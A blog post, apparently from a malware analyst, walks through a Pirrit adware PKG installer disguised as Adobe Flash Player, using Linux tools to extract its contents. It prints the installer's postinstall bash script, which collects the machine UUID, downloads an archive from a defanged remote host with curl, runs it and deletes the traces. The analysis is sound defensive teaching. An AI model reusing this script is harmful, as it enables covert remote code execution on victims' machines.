Home Analyzing a Pirrit adware installer
Post
Cancel

Analyzing a Pirrit adware installer

Posted May 13, 2022
By Tony Lambert
9 min read

While Windows holds the largest market share on malware, macOS has its fair share of threats that mostly exist in an adware/grayware area. In this post I want to walk through how a Pirrit PKG file installer works. There are lots of more complex threats, but this is a good place to start if you’re just jumping into analysis. If you want to follow along at home, I’m working with this file in MalwareBazaar: https://bazaar.abuse.ch/sample/d39426dbceb54bba51587242f8101184df43cc23af7dc7b364ca2327e28e7825/.

Triaging the installer

First, we need to verify we’re looking at a macOS installer file. To do this, we can use file and diec.

1
2
3
4
5
6

remnux@remnux:~/cases/pirrit$ file FlashPlayer_01.0.pkg 
FlashPlayer_01.0.pkg: xar archive compressed TOC: 4540, SHA-1 checksum

remnux@remnux:~/cases/pirrit$ diec FlashPlayer_01.0.pkg 
Binary
    Archive: XAR

The macOS pkg installer file format is a XAR archive, so the output from both utilities jives with what I would expect. From here we have to extract the installer material.

Extracting the package contents

To extract the package contents we can use bsdtar from the libarchive-tools Ubuntu Linux package. The usual tar utility doesn’t work for me, but the FreeBSD implementation in the package works.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

remnux@remnux:~/cases/pirrit$ mkdir extracted

remnux@remnux:~/cases/pirrit$ bsdtar xvf FlashPlayer_01.0.pkg -C extracted/
x Distribution
x Resources
x Resources/adobe_backgrounda.png
x Resources/en.lproj
x Resources/en.lproj/iem.html
x Resources/adobe_background.png
x base.pkg
x base.pkg/Payload
x base.pkg/Bom
x base.pkg/Scripts
x base.pkg/PackageInfo

After successfully extracting the files to the “extracted” folder, we can browse around the installer file’s contents. The first step will be inspecting the extracted Distribution file.

Inspecting Distribution

The Distribution file contains details to help define and control the installation experience, which may include multiple packages within a single PKG file. In most case, the file is easily viewed in a text editor.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

<?xml version="1.0" encoding="utf-8"?>
<installer-script minSpecVersion="1.000000" authoringTool="com.apple.PackageMaker" authoringToolVersion="3.0.3" authoringToolBuild="174">
    <title>Install Wizz</title>
    <options customize="never" allow-external-scripts="no"/>
    <domains enable_anywhere="true"/>
    <installation-check script="pm_install_check();"/>
    <script>function pm_install_check() {
  if(!(system.compareVersions(system.version.ProductVersion,'10.5') >= 0)) {
    my.result.title = 'Failure';
    my.result.message = 'You need at least Mac OS X 10.5 to install Install Wizz products.';
    my.result.type = 'Fatal';
    return false;
  }
  return true;
}
</script>
    <background file="adobe_backgrounda.png" alignment="left" scaling="none"/>
    <welcome file="iem.html"/>
    <choices-outline>
        <line choice="choice1"/>
    </choices-outline>
    <choice id="choice1" title="base">
        <pkg-ref id="com.InstallWizz.base.pkg"/>
    </choice>
    <pkg-ref id="com.InstallWizz.base.pkg" installKBytes="200" version="2.2.5" auth="">#base.pkg</pkg-ref>
</installer-script>

The installer-script tag gives some metadata regarding what tools created the installer file. In this case it looks like the authors possibly used PackageMaker 3.0.3. This metadata is possibly arbitrary because I’ve encountered Distribution files that don’t have it inside. The next interesting thing is the chunk of JavaScript code contained within the script tag and called by the installation-check tag. In this code, the developer defined a pm_install_check() which determines the current system’s macOS version using system.version.ProductVersion. The version number is compared to 10.5 and the installation will only proceed if the version is later than that version. If the macOS version is older than Snow Leopard, the installation fails.

Finally, the Distribution file references a base.pkg package that will be applied to the system during installation. We saw some references to base.pkg during extraction, so let’s go check that out.

Examining base.pkg

Getting a directory listing for base.pkg, we can see a few files.

1
2
3
4
5
6
7
8

remnux@remnux:~/cases/pirrit/extracted/base.pkg$ ll
total 24
drwxr-xr-x 2 remnux remnux 4096 Apr 29  2017 ./
drwxrwxr-x 4 remnux remnux 4096 May 13 20:30 ../
-rw-r--r-- 1 remnux remnux 1022 Apr 29  2017 Bom
-rw-r--r-- 1 remnux remnux  394 Apr 29  2017 PackageInfo
-rw-r--r-- 1 remnux remnux  114 Apr 29  2017 Payload
-rw-r--r-- 1 remnux remnux  697 Apr 29  2017 Scripts

There are a few files here. First, Bom is a “bill of materials” file. This file is supposed to contain a list of files and things to touch during the installation and it doesn’t typically contain malicious code. One of the things on my “to-do” list is to write a tool I like to parse Bom files. The next interesting file is PackageInfo. This is a XML file that describes the contents of base.pkg.

1
2
3
4
5
6
7
8
9

<pkg-info format-version="2" identifier="com.DataTech.base.pkg" version="1.3.0" install-location="/" auth="">
  <payload installKBytes="200" numberOfFiles="2"/>
  <scripts>
    <postinstall file="./postinstall"/>
  </scripts>
<bundle-version>
    <bundle id="com.DataTech" CFBundleIdentifier="com.DataTech" path="./Applications/DataTech.app" CFBundleVersion="1"/>
</bundle-version>
</pkg-info>

The payload tag has some metadata to show that the installed components are supposed to be 2 files totaling 200 KB in size. A payload size this small typically indicates that there isn’t much of any payload in the package at all, I’d expect there to be script content here rather than Mach-O binaries. The scripts tag specifies that we can expect a postinstall script to be present and execute during installation. In many cases you’ll also see a preinstall script. In legitimate installers these scripts are intended to prepare a system for installation and then clean up components afterward. In malicious installers, the scripts are usually used to establish persistence or download additional content.

Let’s jump over to inspect the package payload.

Extracting and analyzing any payloads

In macOS PKG files, the “payload” and “script” contents are stored within archives that are compressed using cpio and gzip. We can extract any contents pretty easily on the Linux command line.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

remnux@remnux:~/cases/pirrit/extracted/base.pkg$ file Payload 
Payload: gzip compressed data, last modified: Sat Apr 29 21:30:57 2017, from Unix, original size modulo 2^32 512

remnux@remnux:~/cases/pirrit/extracted/base.pkg$ cat Payload | gunzip | cpio -i
1 block

remnux@remnux:~/cases/pirrit/extracted/base.pkg$ ll
total 28
drwxr-xr-x 3 remnux remnux 4096 May 13 21:18 ./
drwxrwxr-x 4 remnux remnux 4096 May 13 20:30 ../
drwxr-xr-x 2 remnux remnux 4096 May 13 21:17 Applications/
-rw-r--r-- 1 remnux remnux 1022 Apr 29  2017 Bom
-rw-r--r-- 1 remnux remnux  394 Apr 29  2017 PackageInfo
-rw-r--r-- 1 remnux remnux  114 Apr 29  2017 Payload
-rw-r--r-- 1 remnux remnux  697 Apr 29  2017 Scripts

remnux@remnux:~/cases/pirrit/extracted/base.pkg$ tree -a Applications/
Applications/

0 directories, 0 files

The only thing within the package’s Payloads archive was an Applications folder, and it didn’t contain anything else. We can do something similar for the Scripts archive.

Extracting and analyzing any scripts

Just like with Payloads, we can extract the contents of Scripts.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

remnux@remnux:~/cases/pirrit/extracted/base.pkg$ cat Scripts | gunzip | cpio -i
4 blocks

remnux@remnux:~/cases/pirrit/extracted/base.pkg$ ll
total 56
drwxr-xr-x 3 remnux remnux 4096 May 13 21:21 ./
drwxrwxr-x 4 remnux remnux 4096 May 13 20:30 ../
-rw-r--r-- 1 remnux remnux   36 May 13 21:21 66c1ffac-c020-4385-b6c8-a23192676f00
-rw-r--r-- 1 remnux remnux   36 May 13 21:21 7d13cfd4-0ea8-423c-aaca-d9724d1ae3f4
-rw-r--r-- 1 remnux remnux   36 May 13 21:21 8b84eaf8-a670-4cd9-b519-46725438c885
-rw-r--r-- 1 remnux remnux   36 May 13 21:21 8d6b1599-5bd7-4043-918c-b67863e24970
-rw-r--r-- 1 remnux remnux   36 May 13 21:21 a62f3b05-8125-4b5e-b035-e49985109b9a
drwxr-xr-x 2 remnux remnux 4096 May 13 21:17 Applications/
-rw-r--r-- 1 remnux remnux 1022 Apr 29  2017 Bom
-rw-r--r-- 1 remnux remnux   36 May 13 21:21 c45eb9d2-0c19-44b3-bdc1-7f936567f746
-rw-r--r-- 1 remnux remnux  394 Apr 29  2017 PackageInfo
-rw-r--r-- 1 remnux remnux  114 Apr 29  2017 Payload
-rwxr-xr-x 1 remnux remnux  756 May 13 21:21 postinstall*
-rw-r--r-- 1 remnux remnux  697 Apr 29  2017 Scripts

The Scripts archive contained multiple files that are named with GUIDs. Inside those files are GUID values that match the name of the file. They don’t seem to add anything to the experience here, so we can focus on the postinstall script itself.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

#!/bin/bash

func_act(){
    OS_Version=$(sw_vers -productVersion)
    mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')
    if [[ ${OS_Version} == *"10.12"* ]]; then
      /usr/bin/curl -s -L -o /var/tmp/act.tgz "hxxp://c.firstinstallmac[.]club/is/cact?i="413cc336-95fb-4d47-aa10-d4f06f790e1c"&ve=10.12&id=$mid"
    else
      /usr/bin/curl -s -L -o /var/tmp/act.tgz "hxxp://c.firstinstallmac[.]club/is/cact?i="413cc336-95fb-4d47-aa10-d4f06f790e1c"&id=$mid"
    fi
    tar -xzf /var/tmp/act.tgz -C /var/tmp
    /var/tmp/act/act "2712c147-7e15-4366-80e0-4c7b98d780f0" "413cc336-95fb-4d47-aa10-d4f06f790e1c"
    sleep 120
    rm -rf /var/tmp/act/act
    rm -rf /var/tmp/act.tgz
}
func_act &

The script defines a function func_act() which downloads and executes arbitrary content from a remote URL. The first few lines grab the macOS version using sw_vers and the affected system’s UUID using ioreg. If macOS version on the affected system is running 10.12 (Sierra) a specific parameter is added to the URL called by curl. No matter the version, however, the script downloads an act.tgz file from c.firstinstallmac[.]club and writes it to disk. The script then unpacks it to /var/tmp/act. Finally, the script executes the process /var/tmp/act/act, feeding some UID values to it as arguments before sleeping and then removing all the contents downloaded.

After executing, the contents from postinstall should not exist on the affected system anymore.

Script-only packages

This installer package is an example of something I’ve seen across Pirrit and WizardUpdate adware families: script-only packages. In these cases, no actual binary content exists in the installer files, and all the executable content is downloaded via a script. I’m not really sure why developers do this, but I suspect it’s related to evading static signatures or allowing the adversary to distribute one single installer while the actual adware/malware downloaded can change out on demand.

Masquerading as Adobe

Before stopping for the night, I want to cover something that is potentially concerning for victims and for legitimate software developers. In this instance of malware and many others, the developer masquerades the installer to pose as an Adobe product. This is seen in an HTML file displayed during the installation that claims to be associated with “Flash Player” and a background image using an Adobe logo.

Masquerading as Adobe

This is even potentially an avenue that developers can use to fight adware, because this stuff definitely isn’t associated with Adobe in any way. Thank you for reading!

malware
malware pirrit pkg postinstall
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents